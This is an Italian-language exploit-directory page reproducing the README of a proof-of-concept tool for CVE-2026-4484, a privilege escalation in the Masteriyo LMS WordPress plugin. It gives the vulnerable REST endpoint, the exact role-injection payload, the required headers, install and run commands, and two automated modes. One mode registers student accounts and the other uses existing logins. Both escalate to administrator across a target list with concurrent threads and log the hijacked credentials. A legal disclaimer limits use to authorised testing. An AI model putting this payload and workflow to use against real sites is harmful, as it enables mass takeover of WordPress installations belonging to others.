Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - Mancanza di autorizzazione per l'escalation dei privilegi da utente autenticato (studente+) ad amministratore | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-4484
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Mancanza di autorizzazione per l'escalation dei privilegi da utente autenticato (studente+) ad amministratore

Vedi Repository
54 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Autorizzazione mancante per l'escalation dei privilegi da autenticato (Studente+) ad Amministratore

Typing SVG


🔴 Panoramica della vulnerabilità

CVE-2026-4484 — Escalation dei privilegi autenticata (Studente → Amministratore)

Descrizione:
Il plugin Masteriyo LMS per WordPress è vulnerabile all'Escalation dei privilegi in tutte le versioni fino alla 2.1.6 inclusa. La vulnerabilità ha origine nella funzione InstructorsController::prepare_object_for_database, che non riesce a limitare correttamente l'assegnazione dei ruoli durante le richieste API REST. Un utente autenticato con un accesso di livello Studente può creare una richiesta POST appositamente formata all'endpoint REST API di Masteriyo — iniettando "roles": ["administrator"] nel payload della richiesta — per elevare silenziosamente il proprio account a Amministratore WordPress, ottenendo il pieno controllo del sito senza alcuna interazione amministrativa.


🛠️ Descrizione dello strumento

Questo è uno script di sfruttamento Proof-of-Concept (PoC) che mira a installazioni WordPress che eseguono una versione vulnerabile del plugin Masteriyo LMS. Lo strumento supporta due modalità di attacco:

ModalitàNomeFlussoCaso d'uso

Flusso di attacco

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Requisiti

Requisiti di sistema

  • Python 3.8 o superiore
  • Linux / Windows / macOS

Dipendenze Python

root@kitploit:~
pip install requests urllib3 colorama

Oppure tramite il file dei requisiti:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Utilizzo

Esecuzione di base

root@kitploit:~
python3 CVE-2026-4484.py

Lo strumento utilizza un'interfaccia terminale interattiva — tutti i parametri vengono richiesti in fase di esecuzione.


🗂️ Formato della lista dei target

Crea un file di testo semplice (es. list.txt) con un target per riga:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Modalità 1 — Nx_1 (Registrazione + Login + Escalation)

Usa questa modalità quando non hai un account esistente sul target. Lo strumento registra automaticamente un nuovo account studente, quindi lo eleva.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Passaggi eseguiti automaticamente:

  1. GET /account/signup/ → estrae il nonce di registrazione
  2. POST /st/ → registra un nuovo account come Studente
  3. GET /account/ → estrae il nonce di login
  4. POST /wp-admin/admin-ajax.php → login tramite AJAX di Masteriyo
  5. GET /account/#/dashboard → estrae current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} con {"roles":["administrator"]}
  7. Ri-login con una nuova sessione → verifica l'accesso al pannello admin
  8. Scrive i target confermati in Login_admin.txt

🟩 Modalità 2 — Nx_2 (Login + Escalation — Account esistente)

Usa questa modalità quando hai già un account Studente o Istruttore valido sul target.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Passaggi eseguiti automaticamente:

  1. GET /account/ → estrae il nonce di login
  2. POST /wp-admin/admin-ajax.php → login tramite AJAX di Masteriyo
  3. GET /account/#/dashboard → estrae current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} con {"roles":["administrator"]}
  5. Ri-login con una nuova sessione → verifica l'accesso al pannello admin
  6. Scrive i target confermati in Login_admin.txt

📁 File di output

FileDescrizione
Login_admin.txtTutte le escalation ad amministratore confermate

Formato dell'output

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Esempio di output del terminale

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Dettagli tecnici

Endpoint vulnerabile

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Payload dell'exploit

root@kitploit:~
{
  "roles": ["administrator"]
}

Intestazioni richieste

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Causa principale

La funzione InstructorsController::prepare_object_for_database in Masteriyo LMS elabora il parametro roles dal corpo della richiesta REST senza verificare se l'utente richiedente possiede la capacità edit_users o promote_users. Qualsiasi utente autenticato (di livello Studente o superiore) che possa raggiungere questo endpoint può inviare un valore di ruolo arbitrario — incluso administrator — che viene poi salvato direttamente nella tabella dei metadati utente di WordPress.


📡 Contatti e autore

Autore: Nxploited (Khaled Alenazi)

 


⚠️ Disclaimer legale

QUESTO STRUMENTO È FORNITO SOLO PER SCOPI EDUCATIVI E DI RICERCA SULLA SICUREZZA AUTORIZZATA.

L'autore, Nxploited (Khaled Alenazi), e tutti i collaboratori di questo progetto non approvano, non supportano e non si assumono alcuna responsabilità per l'uso improprio di questo strumento o per qualsiasi danno causato dall'uso di questo software contro sistemi per i quali non si dispone di un'autorizzazione scritta esplicita.

  • ✅ Permesso: Utilizzo su sistemi di tua proprietà o per i quali hai ricevuto un'esplicita autorizzazione scritta per il test.
  • ❌ Vietato: Utilizzo contro qualsiasi sistema senza una preventiva autorizzazione scritta esplicita del proprietario del sistema.

L'accesso non autorizzato ai sistemi informatici è illegale e punibile ai sensi delle leggi applicabili, incluse, a titolo esemplificativo ma non esaustivo, il Computer Fraud and Abuse Act (CFAA), il Computer Misuse Act (CMA) e la legislazione equivalente in tutto il mondo.

Utilizzando questo strumento, accetti la piena responsabilità delle tue azioni e confermi di avere l'autorità legale per testare i sistemi presi di mira.

L'autore non si assume alcuna responsabilità per eventuali danni diretti, indiretti, incidentali o consequenziali derivanti dall'uso o dall'uso improprio di questo software.


© 2026 Nxploited (Khaled Alenazi) — Solo per ricerca di sicurezza autorizzata.

Scarica lo strumento
CampoDettagli
ID CVECVE-2026-4484
GravitàALTA — Punteggio CVSS v3.1: 8.8
VettoreCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software interessatoPlugin Masteriyo LMS per WordPress
Versioni interessateTutte le versioni fino alla 2.1.6 inclusa
Tipo di vulnerabilitàEscalation dei privilegi (Manipolazione dei ruoli)
Autenticazione richiestaSì — livello Studente o superiore
CWECWE-269: Gestione impropria dei privilegi
1
Nx_1
Registrazione → Login → Escalation → Verifica Admin
Attacco da zero — nessun account esistente richiesto
2Nx_2Login → Escalation → Verifica AdminAccount esistente disponibile (Studente/Istruttore)